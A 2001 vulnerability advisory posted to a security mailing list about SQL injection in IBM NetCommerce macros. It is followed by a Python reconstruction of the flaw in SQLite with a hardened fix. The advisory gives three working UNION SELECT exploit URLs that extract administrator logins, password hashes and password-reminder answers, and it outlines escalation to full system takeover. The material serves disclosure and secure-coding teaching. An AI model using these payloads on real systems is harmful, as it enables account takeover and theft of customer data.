From: rudi carell (rudicarellHOTMAIL.COM)
Date: Mon Feb 05 2001 - 12:13:10 CST


    Hola friends,

    While I was participating in the OpenHack contest
    I found a couple of serious security holes within IBM's
    so-called "NetCommerce" thing, which seems to be a mixture of
    WebSphere, Net.Data, servlets, JSPs and DB2?

    However.. summary:

    class: input validation error
    remote: yes
    local: yes
    vulnerable: IBM NetCommerce 3???

    description:

    Besides well-known WebSphere bugs (file disclosure and default admin
    passwords) ...

    the most dangerous bugs result from NON-existent input validation within
    NetCommerce's Net.Data "macros".

    By crafting malformed HTTP requests it is possible to extract "any"
    NetCommerce database information.

    Combining this method with other default NetCommerce functionality
    (PasswordReset, for example) it is possible to take hold of so-called
    "store-" or "site-manager" accounts.

    Once you're an NC administrator you are allowed to use all the admin tools.

    At this point you're able to up- and download files, issue OS commands
    or do any query with the very, very high-privileged DB2INST1 account.

    This can lead to a possible take-over of the whole system....

    Many default macros are vulnerable to this (classic :-) sort of attack.

    exploit:

    a few examples:

    1) "HowTo find Administrator Accounts"
    http://shophost.com/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999+union+select+shlogid+as+mestname,0+from+shopper+where+shshtyp+%3d+'A';

    2) "Passwords(crypted)"
    http://shophost.com/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999+union+select+shlpswd+as+mestname,0+from+shopper+where+shlogid+%3d+'ncadmin';

    3) "Password-Reminders"
    http://shophost.com/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999+union+select+shchaans+as+mestname,0+from+shopper+where+shlogid+%3d+'ncadmin';

    Of course "orderdspc.d2w" is not the only vulnerable macro.. it's just an
    example. Casting between different data types is possible (read the DB2 man
    pages).

    Also it should (not proven) be possible to query other databases.

    vendor status:

    This mail was sent to ers@ers.ibm.com last week.
    (ERS = emergency response team)

    nice day,

    rc

    rudicarellhotmail.com
    securityfreefly.com

    <FLAME> Due to the very unprofessional (or should I say unfair) system setup
    of the OpenHack servers I was not able to prove the whole concept </FLAME>

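The three URLs above all share one shape: a non-existent order number (99999) so the macro's own query returns nothing, followed by a UNION SELECT that aliases a column of the shopper table to a column the report already displays (mestname) and pads the second column with a constant so the column counts match. The following is an added example, not code from the post or from IBM NetCommerce: it rebuilds that pattern against a constructed SQLite stand-in. The table and column names (orders, shopper, shlogid, shlpswd, shchaans, shshtyp, mestname) come from the post's URLs; the schema, the sample rows, the second column name ortotal and the function names are assumptions. It shows the unvalidated query beside a hardened one that parses order_rn as an integer and binds it as a parameter.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the NetCommerce tables the post queries.

    Column names follow the post's URLs; the layout, the ortotal column and
    the rows are assumptions made for this example only.
    """
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE orders  (order_rn INTEGER, mestname TEXT, ortotal INTEGER);
        CREATE TABLE shopper (shlogid TEXT, shlpswd TEXT, shchaans TEXT, shshtyp TEXT);
        INSERT INTO orders  VALUES (1001, 'Alice Example', 4200);
        INSERT INTO shopper VALUES ('ncadmin', 'XyZ4fakehash', 'first pet: rex', 'A');
        INSERT INTO shopper VALUES ('bob',     'Qw9fakehash',  'maiden name',    'R');
    """)
    return db


def vulnerable_order_report(db, order_rn):
    """Models the unvalidated macro: the request parameter is pasted into SQL.

    Whatever the client sends as order_rn becomes part of the statement, so a
    UNION SELECT appended to the number reaches the database verbatim.
    """
    sql = f"SELECT mestname, ortotal FROM orders WHERE order_rn = {order_rn}"
    return db.execute(sql).fetchall()


def hardened_order_report(db, order_rn):
    """Same report with the fix: validate the type, then bind the value.

    int() rejects '99999 union select ...' outright, and the bound parameter
    means the value can never be interpreted as SQL even if it were a string.
    """
    try:
        n = int(order_rn)
    except (TypeError, ValueError):
        raise ValueError("order_rn must be an integer")
    return db.execute(
        "SELECT mestname, ortotal FROM orders WHERE order_rn = ?", (n,)
    ).fetchall()


def injection_payload(column, where):
    """Rebuilds the payload shape from the post's URLs (URL-decoded).

    99999 matches no order, so only the UNIONed shopper rows come back; the
    shopper column is aliased to mestname so the report prints it in place of
    the customer name, and the constant 0 fills the second column.
    """
    return f"99999 union select {column} as mestname, 0 from shopper where {where}"


if __name__ == "__main__":
    db = make_db()
    # Example 1 from the post: list administrator logins (shshtyp = 'A').
    print(vulnerable_order_report(db, injection_payload("shlogid", "shshtyp = 'A'")))
    # Example 2: the (hashed) password of ncadmin.
    print(vulnerable_order_report(db, injection_payload("shlpswd", "shlogid = 'ncadmin'")))
    # The hardened report refuses the same input.
    try:
        hardened_order_report(db, injection_payload("shlogid", "shshtyp = 'A'"))
    except ValueError as e:
        print("rejected:", e)
```

The two functions take the same argument so the difference is only where the value meets the SQL. Note that the column-count match (two columns on each side of the UNION) and the alias are what make the result render through the unmodified report template; the CAST remark in the post covers the case where the displayed column and the stolen column have different types.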